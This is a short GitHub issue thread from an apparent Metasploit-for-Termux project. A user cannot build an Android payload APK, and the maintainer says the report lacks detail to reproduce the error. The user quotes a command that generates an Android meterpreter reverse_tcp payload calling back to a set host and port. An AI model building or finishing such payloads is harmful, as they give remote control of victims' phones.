### ISSUE TITLE
Can't Create Payload Apk

### ISSUE THREAD

**Issue by suriano998** [Hax4us/Metasploit_termux#68]
After Trying "android/meterpreter/reverse_tcp LHOST=192.168.2.102 LPORT=4444 R
> /sdcard/test.apk"

![Screenshot_20210308-161526](https://user-images.githubusercontent.com/59099065/110341979-353be980-802b-11eb-8e83-35a69c164784.png)

I dont know why this is, pls help.

**Comment by Hax4us** [comment]
i can't see any relevant information for reproduce your error.
